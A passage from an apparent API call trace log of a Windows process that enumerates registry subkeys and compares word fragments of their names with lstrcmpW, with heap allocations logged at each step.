(lpString="FileSystem") returned 10 [0181.572] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x16) returned 0x6cb058 [0181.572] lstrcmpW (lpString1="acpi", lpString2="file") returned -1 [0181.572] lstrcmpW (lpString1="name", lpString2="file") returned 1 [0181.572] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1a) returned 0x6c4200 [0181.572] lstrcmpW (lpString1="backup", lpString2="system") returned -1 [0181.572] lstrcmpW (lpString1="device", lpString2="system") returned -1 [0181.572] lstrcmpW (lpString1="errata", lpString2="system") returned -1 [0181.572] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x14, lpName=0x18fd58, cchName=0x104 | out: lpName="FileSystemUtilities") returned 0x0 [0181.572] lstrlenW (lpString="FileSystemUtilities") returned 19 [0181.573] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x16) returned 0x6cb078 [0181.573] lstrcmpW (lpString1="acpi", lpString2="file") returned -1 [0181.573] lstrcmpW (lpString1="name", lpString2="file") returned 1 [0181.573] lstrcmpW (lpString1="file", lpString2="file") returned 0 [0181.573] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6cb078 | out: hHeap=0x6b0000) returned 1 [0181.573] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1a) returned 0x6c4228 [0181.573] lstrcmpW (lpString1="backup", lpString2="system") returned -1 [0181.573] lstrcmpW (lpString1="device", lpString2="system") returned -1 [0181.573] lstrcmpW (lpString1="errata", lpString2="system") returned -1 [0181.573] lstrcmpW (lpString1="system", lpString2="system") returned 0 [0181.573] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6c4228 | out: hHeap=0x6b0000) returned 1 [0181.573] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x20) returned 0x6c4228 [0181.573] lstrcmpW (lpString1="overrides", lpString2="utilities") returned -1 [0181.573] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x15, lpName=0x18fd58, cchName=0x104 | out: lpName="GraphicsDrivers") returned 0x0 [0181.573] lstrlenW (lpString="GraphicsDrivers") returned 15 [0181.573] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1e) returned 0x6c4250 [0181.573] lstrcmpW (lpString1="arbiters", lpString2="graphics") returned -1 [0181.574] lstrcmpW (lpString1="computer", lpString2="graphics") returned -1 [0181.574] lstrcmpW (lpString1="critical", lpString2="graphics") returned -1 [0181.574] lstrcmpW (lpString1="database", lpString2="graphics") returned -1 [0181.574] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1c) returned 0x6c4278 [0181.574] lstrcmpW (lpString1="restore", lpString2="drivers") returned 1 [0181.574] lstrcmpW (lpString1="arbiter", lpString2="drivers") returned -1 [0181.574] lstrcmpW (lpString1="content", lpString2="drivers") returned -1 [0181.574] lstrcmpW (lpString1="control", lpString2="drivers") returned -1 [0181.574] lstrcmpW (lpString1="classes", lpString2="drivers") returned -1 [0181.574] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x16, lpName=0x18fd58, cchName=0x104 | out: lpName="GroupOrderList") returned 0x0 [0181.574] lstrlenW (lpString="GroupOrderList") returned 14 [0181.574] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6cb078 [0181.574] lstrcmpW (lpString1="class", lpString2="group") returned -1 [0181.574] lstrcmpW (lpString1="index", lpString2="group") returned 1 [0181.574] lstrcmpW (lpString1="crash", lpString2="group") returned -1 [0181.574] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6cb098 [0181.575] lstrcmpW (lpString1="class", lpString2="order") returned -1 [0181.575] lstrcmpW (lpString1="index", lpString2="order") returned -1 [0181.575] lstrcmpW (lpString1="crash", lpString2="order") returned -1 [0181.575] lstrcmpW (lpString1="group", lpString2="order") returned -1 [0181.575] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x16) returned 0x6cb0b8 [0181.575] lstrcmpW (lpString1="acpi", lpString2="list") returned -1 [0181.575] lstrcmpW (lpString1="name", lpString2="list") returned 1 [0181.575] lstrcmpW (lpString1="file", lpString2="list") returned -1 [0181.575] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x17, lpName=0x18fd58, cchName=0x104 | out: lpName="HAL") returned 0x0 [0181.575] lstrlenW (lpString="HAL") returned 3 [0181.575] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6cb0d8 [0181.575] lstrcmpW (lpString1="agp", lpString2="hal") returned -1 [0181.575] lstrcmpW (lpString1="app", lpString2="hal") returned -1 [0181.575] lstrcmpW (lpString1="cmf", lpString2="hal") returned -1 [0181.575] lstrcmpW (lpString1="com", lpString2="hal") returned -1 [0181.575] lstrcmpW (lpString1="els", lpString2="hal") returned -1 [0181.576] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x18, lpName=0x18fd58, cchName=0x104 | out: lpName="IDConfigDB") returned 0x0 [0181.576] lstrlenW (lpString="IDConfigDB") returned 10 [0181.576] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1e) returned 0x6c42a0 [0181.576] lstrcmpW (lpString1="arbiters", lpString2="idconfig") returned -1 [0181.576] lstrcmpW (lpString1="computer", lpString2="idconfig") returned -1 [0181.576] lstrcmpW (lpString1="critical", lpString2="idconfig") returned -1 [0181.576] lstrcmpW (lpString1="database", lpString2="idconfig") returned -1 [0181.576] lstrcmpW (lpString1="graphics", lpString2="idconfig") returned -1 [0181.576] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x12) returned 0x6cb0f8 [0181.576] lstrcmpW (lpString1="id", lpString2="db") returned 1 [0181.576] lstrcmpW (lpString1="co", lpString2="db") returned -1 [0181.576] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x19, lpName=0x18fd58, cchName=0x104 | out: lpName="Keyboard Layout") returned 0x0 [0181.576] lstrlenW (lpString="Keyboard Layout") returned 15 [0181.576] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1e) returned 0x6c42c8 [0181.576] lstrcmpW (lpString1="arbiters", lpString2="keyboard") returned -1 [0181.576] lstrcmpW (lpString1="computer", lpString2="keyboard") returned -1 [0181.576] lstrcmpW (lpString1="critical", lpString2="keyboard") returned -1 [0181.577] lstrcmpW (lpString1="database", lpString2="keyboard") returned -1 [0181.577] lstrcmpW (lpString1="graphics", lpString2="keyboard") returned -1 [0181.577] lstrcmpW (lpString1="idconfig", lpString2="keyboard") returned -1 [0181.577] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1a) returned 0x6c42f0 [0181.577] lstrcmpW (lpString1="backup", lpString2="layout") returned -1 [0181.577] lstrcmpW (lpString1="device", lpString2="layout") returned -1 [0181.577] lstrcmpW (lpString1="errata", lpString2="layout") returned -1 [0181.577] lstrcmpW (lpString1="system", lpString2="layout") returned 1 [0181.577] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x1a, lpName=0x18fd58, cchName=0x104 | out: lpName="Keyboard Layouts") returned 0x0 [0181.577] lstrlenW (lpString="Keyboard Layouts") returned 16 [0181.577] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1e) returned 0x6c4318 [0181.577] lstrcmpW (lpString1="arbiters", lpString2="keyboard") returned -1 [0181.577] lstrcmpW (lpString1="computer", lpString2="keyboard") returned -1 [0181.577] lstrcmpW (lpString1="critical", lpString2="keyboard") returned -1 [0181.577] lstrcmpW (lpString1="database", lpString2="keyboard") returned -1 [0181.577] lstrcmpW (lpString1="graphics", lpString2="keyboard") returned -1 [0181.578] lstrcmpW (lpString1="idconfig", lpString2="keyboard") returned -1 [0181.578] lstrcmpW (lpString1="keyboard", lpString2="keyboard") returned 0 [0181.578] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6c4318 | out: hHeap=0x6b0000) returned 1 [0181.578] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1c) returned 0x6c4318 [0181.578] lstrcmpW (lpString1="restore", lpString2="layouts") returned 1 [0181.578] lstrcmpW (lpString1="arbiter", lpString2="layouts") returned -1 [0181.578] lstrcmpW (lpString1="content", lpString2="layouts") returned -1 [0181.578] lstrcmpW (lpString1="control", lpString2="layouts") returned -1 [0181.578] lstrcmpW (lpString1="classes", lpString2="layouts") returned -1 [0181.578] lstrcmpW (lpString1="drivers", lpString2="layouts") returned -1 [0181.578] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x1b, lpName=0x18fd58, cchName=0x104 | out: lpName="Lsa") returned 0x0 [0181.578] lstrlenW (lpString="Lsa") returned 3 [0181.578] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6cb118 [0181.578] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0181.578] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0181.578] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0181.578] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0181.579] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0181.579] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0181.579] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x1c, lpName=0x18fd58, cchName=0x104 | out: lpName="LsaExtensionConfig") returned 0x0 [0181.579] lstrlenW (lpString="LsaExtensionConfig") returned 18 [0181.579] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6cb138 [0181.579] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0181.579] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0181.579] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0181.579] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0181.579] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0181.579] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0181.579] lstrcmpW (lpString1="lsa", lpString2="lsa") returned 0 [0181.579] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6cb138 | out: hHeap=0x6b0000) returned 1 [0181.579] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x20) returned 0x6c4340 [0181.579] lstrcmpW (lpString1="overrides", lpString2="extension") returned 1 [0181.579] lstrcmpW (lpString1="utilities", lpString2="extension") returned 1 [0181.579] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1a) returned 0x6cb808 [0181.580] lstrcmpW (lpString1="backup", lpString2="config") returned -1 [0181.580] lstrcmpW (lpString1="device", lpString2="config") returned 1 [0181.580] lstrcmpW (lpString1="errata", lpString2="config") returned 1 [0181.580] lstrcmpW (lpString1="system", lpString2="config") returned 1 [0181.580] lstrcmpW (lpString1="layout", lpString2="config") returned 1 [0181.580] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x1d, lpName=0x18fd58, cchName=0x104 | out: lpName="LsaInformation") returned 0x0 [0181.581] lstrlenW (lpString="LsaInformation") returned 14 [0181.581] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6cb138 [0181.581] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0181.581] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0181.581] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0181.581] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0181.581] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0181.581] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0181.581] lstrcmpW (lpString1="lsa", lpString2="lsa") returned 0 [0181.581] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6cb138 | out: hHeap=0x6b0000) returned 1 [0181.581] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x24) returned 0x6cbff0 [0181.581] lstrcmpW (lpString1="diagnostics", lpString2="information") returned -1 [0181.581] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x1e, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaCategories") returned 0x0 [0181.581] lstrlenW (lpString="MediaCategories") returned 15 [0181.581] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6cb138 [0181.581] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0181.582] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0181.582] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0181.582] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0181.582] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0181.582] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x22) returned 0x6cc020 [0181.582] lstrcmpW (lpString1="installers", lpString2="categories") returned 1 [0181.582] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x1f, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaDRM") returned 0x0 [0181.582] lstrlenW (lpString="MediaDRM") returned 8 [0181.582] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6cb158 [0181.582] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0181.582] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0181.582] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0181.582] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0181.582] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0181.582] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0181.582] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6cb158 | out: hHeap=0x6b0000) returned 1 [0181.582] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6cb158 [0181.583] lstrcmpW (lpString1="agp", lpString2="drm") returned -1 [0181.583] lstrcmpW (lpString1="app", lpString2="drm") returned -1 [0181.583] lstrcmpW (lpString1="cmf", lpString2="drm") returned -1 [0181.583] lstrcmpW (lpString1="com", lpString2="drm") returned -1 [0181.583] lstrcmpW (lpString1="els", lpString2="drm") returned 1 [0181.583] lstrcmpW (lpString1="hal", lpString2="drm") returned 1 [0181.583] lstrcmpW (lpString1="lsa", lpString2="drm") returned 1 [0181.583] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x20, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaInterfaces") returned 0x0 [0181.583] lstrlenW (lpString="MediaInterfaces") returned 15 [0181.583] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6cb178 [0181.583] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0181.583] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0181.583] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0181.583] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0181.583] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0181.583] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0181.584] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6cb178 | out: hHeap=0x6b0000) returned 1 [0181.584] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x22) returned 0x6cc050 [0181.584] lstrcmpW (lpString1="installers", lpString2="interfaces") returned -1 [0181.584] lstrcmpW (lpString1="categories", lpString2="interfaces") returned -1 [0181.584] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x21, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaProperties") returned 0x0 [0181.584] lstrlenW (lpString="MediaProperties") returned 15 [0181.584] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6cb178 [0181.584] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0181.584] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0181.584] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0181.584] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0181.584] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0181.584] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0181.584] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6cb178 | out: hHeap=0x6b0000) returned 1 [0181.584] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x22) returned 0x6cc080 [0181.584] lstrcmpW (lpString1="installers", lpString2="properties") returned -1 [0181.584] lstrcmpW (lpString1="categories", lpString2="properties") returned -1 [0181.585] lstrcmpW (lpString1="interfaces", lpString2="properties") returned -1 [0181.585] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x22, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaTypes") returned 0x0 [0181.585] lstrlenW (lpString="MediaTypes") returned 10 [0181.585] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6cb178 [0181.585] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0181.585] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0181.585] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0181.585] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0181.585] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0181.585] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0181.585] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6cb178 | out: hHeap=0x6b0000) returned 1 [0181.585] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6cb178 [0181.585] lstrcmpW (lpString1="class", lpString2="types") returned -1 [0181.585] lstrcmpW (lpString1="index", lpString2="types") returned -1 [0181.585] lstrcmpW (lpString1="crash", lpString2="types") returned -1 [0181.585] lstrcmpW (lpString1="group", lpString2="types") returned -1 [0181.585] lstrcmpW (lpString1="order", lpString2="types") returned -1 [0181.585] lstrcmpW (lpString1="media", lpString2="types") returned -1 [0181.586] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x23, lpName=0x18fd58, cchName=0x104 | out: lpName="MobilePC") returned 0x0 [0181.586] lstrlenW (lpString="MobilePC") returned 8 [0181.586] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1a) returned 0x6cb830 [0181.586] lstrcmpW (lpString1="backup", lpString2="mobile") returned -1 [0181.586] lstrcmpW (lpString1="device", lpString2="mobile") returned -1 [0181.586] lstrcmpW (lpString1="errata", lpString2="mobile") returned -1 [0181.586] lstrcmpW (lpString1="system", lpString2="mobile") returned 1 [0181.586] lstrcmpW (lpString1="layout", lpString2="mobile") returned -1 [0181.586] lstrcmpW (lpString1="config", lpString2="mobile") returned -1 [0181.586] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x12) returned 0x6cb198 [0181.586] lstrcmpW (lpString1="id", lpString2="pc") returned -1 [0181.586] lstrcmpW (lpString1="co", lpString2="pc") returned -1 [0181.586] lstrcmpW (lpString1="db", lpString2="pc") returned -1 [0181.586] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x24, lpName=0x18fd58, cchName=0x104 | out: lpName="MPDEV") returned 0x0 [0181.586] lstrlenW (lpString="MPDEV") returned 5 [0181.586] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6cb1b8 [0181.586] lstrcmpW (lpString1="class", lpString2="mpdev") returned -1 [0181.587] lstrcmpW (lpString1="index", lpString2="mpdev") returned -1 [0181.587] lstrcmpW (lpString1="crash", lpString2="mpdev") returned -1 [0181.587] lstrcmpW (lpString1="group", lpString2="mpdev") returned -1 [0181.587] lstrcmpW (lpString1="order", lpString2="mpdev") returned 1 [0181.587] lstrcmpW (lpString1="media", lpString2="mpdev") returned -1 [0181.587] lstrcmpW (lpString1="types", lpString2="mpdev") returned 1 [0181.587] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x25, lpName=0x18fd58, cchName=0x104 | out: lpName="MSDTC") returned 0x0 [0181.587] lstrlenW (lpString="MSDTC") returned 5 [0181.587] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6cb1d8 [0181.587] lstrcmpW (lpString1="class", lpString2="msdtc") returned -1 [0181.587] lstrcmpW (lpString1="index", lpString2="msdtc") returned -1 [0181.587] lstrcmpW (lpString1="crash", lpString2="msdtc") returned -1 [0181.587] lstrcmpW (lpString1="group", lpString2="msdtc") returned -1 [0181.587] lstrcmpW (lpString1="order", lpString2="msdtc") returned 1 [0181.587] lstrcmpW (lpString1="media", lpString2="msdtc") returned -1 [0181.587] lstrcmpW (lpString1="types", lpString2="msdtc") returned 1 [0181.588] lstrcmpW (lpString1="mpdev", lpString2="msdtc") returned -1 [0181.588] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x26, lpName=0x18fd58, cchName=0x104 | out: lpName="MUI") returned 0x0 [0181.588] lstrlenW (lpString="MUI") returned 3 [0181.588] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6cb1f8 [0181.588] lstrcmpW (lpString1="agp", lpString2="mui") returned -1 [0181.588] lstrcmpW (lpString1="app", lpString2="mui") returned -1 [0181.588] lstrcmpW (lpString1="cmf", lpString2="mui") returned -1 [0181.588] lstrcmpW (lpString1="com", lpString2="mui") returned -1 [0181.588] lstrcmpW (lpString1="els", lpString2="mui") returned -1 [0181.588] lstrcmpW (lpString1="hal", lpString2="mui") returned -1 [0181.588] lstrcmpW (lpString1="lsa", lpString2="mui") returned -1 [0181.588] lstrcmpW (lpString1="drm", lpString2="mui") returned -1 [0181.588] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x27, lpName=0x18fd58, cchName=0x104 | out: lpName="NetDiagFx") returned 0x0 [0181.588] lstrlenW (lpString="NetDiagFx") returned 9 [0181.588] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6cb218 [0181.588] lstrcmpW (lpString1="agp", lpString2="net") returned -1 [0181.588] lstrcmpW (lpString1="app", lpString2="net") returned -1 [0181.589] lstrcmpW (lpString1="cmf", lpString2="net") returned -1 [0181.589] lstrcmpW (lpString1="com", lpString2="net") returned -1 [0181.589] lstrcmpW (lpString1="els", lpString2="net") returned -1 [0181.589] lstrcmpW (lpString1="hal", lpString2="net") returned -1 [0181.589] lstrcmpW (lpString1="lsa", lpString2="net") returned -1 [0181.589] lstrcmpW (lpString1="drm", lpString2="net") returned -1 [0181.589] lstrcmpW (lpString1="mui", lpString2="net") returned -1 [0181.589] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x16) returned 0x6cb238 [0181.589] lstrcmpW (lpString1="acpi", lpString2="diag") returned -1 [0181.589] lstrcmpW (lpString1="name", lpString2="diag") returned 1 [0181.589] lstrcmpW (lpString1="file", lpString2="diag") returned 1 [0181.589] lstrcmpW (lpString1="list", lpString2="diag") returned 1 [0181.589] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x12) returned 0x6cb258 [0181.589] lstrcmpW (lpString1="id", lpString2="fx") returned 1 [0181.589] lstrcmpW (lpString1="co", lpString2="fx") returned -1 [0181.589] lstrcmpW (lpString1="db", lpString2="fx") returned -1 [0181.590] lstrcmpW (lpString1="pc", lpString2="fx") returned 1 [0181.590] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x28, lpName=0x18fd58, cchName=0x104 | out: lpName="NetTrace") returned 0x0 [0181.590] lstrlenW (lpString="NetTrace") returned 8 [0181.590] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6cb278 [0181.590] lstrcmpW (lpString1="agp", lpString2="net") returned -1 [0181.590] lstrcmpW (lpString1="app", lpString2="net") returned -1 [0181.590] lstrcmpW (lpString1="cmf", lpString2="net") returned -1 [0181.590] lstrcmpW (lpString1="com", lpString2="net") returned -1 [0181.590] lstrcmpW (lpString1="els", lpString2="net") returned -1 [0181.590] lstrcmpW (lpString1="hal", lpString2="net") returned -1 [0181.590] lstrcmpW (lpString1="lsa", lpString2="net") returned -1 [0181.590] lstrcmpW (lpString1="drm", lpString2="net") returned -1 [0181.590] lstrcmpW (lpString1="mui", lpString2="net") returned -1 [0181.590] lstrcmpW (lpString1="net", lpString2="net") returned 0 [0181.590] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6cb278 | out: hHeap=0x6b0000) returned 1 [0181.590] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6cb278 [0181.590] lstrcmpW (lpString1="class", lpString2="trace") returned -1 [0181.591] lstrcmpW (lpString1="index", lpString2="trace") returned -1 [0181.591] lstrcmpW (lpString1="crash", lpString2="trace") returned -1 [0181.591] lstrcmpW (lpString1="group", lpString2="trace") returned -1 [0181.591] lstrcmpW (lpString1="order", lpString2="trace") returned -1 [0181.591] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x29, lpName=0x18fd58, cchName=0x104 | out: lpName="Network") returned 0x0 [0181.591] lstrlenW (lpString="Network") returned 7 [0181.591] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1c) returned 0x6cb858 [0181.591] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x2a, lpName=0x18fd58, cchName=0x104 | out: lpName="NetworkProvider") returned 0x0 [0181.591] lstrlenW (lpString="NetworkProvider") returned 15 [0181.591] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1c) returned 0x6cb880 [0181.592] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x2b, lpName=0x18fd58, cchName=0x104 | out: lpName="Nls") returned 0x0 [0181.592] lstrlenW (lpString="Nls") returned 3 [0181.592] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6cb298 [0181.592] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x2c, lpName=0x18fd58, cchName=0x104 | out: lpName="NodeInterfaces") returned 0x0 [0181.592] lstrlenW (lpString="NodeInterfaces") returned 14 [0181.592] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x16) returned 0x6cb2b8 [0181.592] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x2d, lpName=0x18fd58, cchName=0x104 | out: lpName="Nsi") returned 0x0 [0181.592] lstrlenW (lpString="Nsi") returned 3 [0181.592] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6cb2d8 [0181.592] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x2e, lpName=0x18fd58, cchName=0x104 | out: lpName="PCW") returned 0x0 [0181.592] lstrlenW (lpString="PCW") returned 3 [0181.592] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6cb2f8 [0181.592] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x2f, lpName=0x18fd58, cchName=0x104 | out: lpName="PnP") returned 0x0 [0181.592] lstrlenW (lpString="PnP") returned 3 [0181.592] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x12) returned 0x6cb318 [0181.592] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x30, lpName=0x18fd58, cchName=0x104 | out: lpName="Power") returned 0x0 [0181.593] lstrlenW (lpString="Power") returned 5 [0181.593] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6cb338 [0181.593] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x31, lpName=0x18fd58, cchName=0x104 | out: lpName="Print") returned 0x0 [0181.593] lstrlenW (lpString="Print") returned 5 [0181.593] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6cb358 [0181.593] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x32, lpName=0x18fd58, cchName=0x104 | out: lpName="PriorityControl") returned 0x0 [0181.593] lstrlenW (lpString="PriorityControl") returned 15 [0181.593] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1e) returned 0x6cb8a8 [0181.593] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x33, lpName=0x18fd58, cchName=0x104 | out: lpName="ProductOptions") returned 0x0 [0181.593] lstrlenW (lpString="ProductOptions") returned 14 [0181.593] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1c) returned 0x6cb8d0 [0181.594] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x34, lpName=0x18fd58, cchName=0x104 | out: lpName="Remote Assistance") returned 0x0 [0181.594] lstrlenW (lpString="Remote Assistance") returned 17 [0181.594] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1a) returned 0x6cb920 [0181.594] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x35, lpName=0x18fd58, cchName=0x104 | out: lpName="SafeBoot") returned 0x0 [0181.594] lstrlenW (lpString="SafeBoot") returned 8 [0181.594] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x16) returned 0x6cb378 [0181.595] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x36, lpName=0x18fd58, cchName=0x104 | out: lpName="ScsiPort") returned 0x0 [0181.595] lstrlenW (lpString="ScsiPort") returned 8 [0181.595] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x16) returned 0x6cb3b8 [0181.595] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x37, lpName=0x18fd58, cchName=0x104 | out: lpName="SecurePipeServers") returned 0x0 [0181.595] lstrlenW (lpString="SecurePipeServers") returned 17 [0181.595] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, 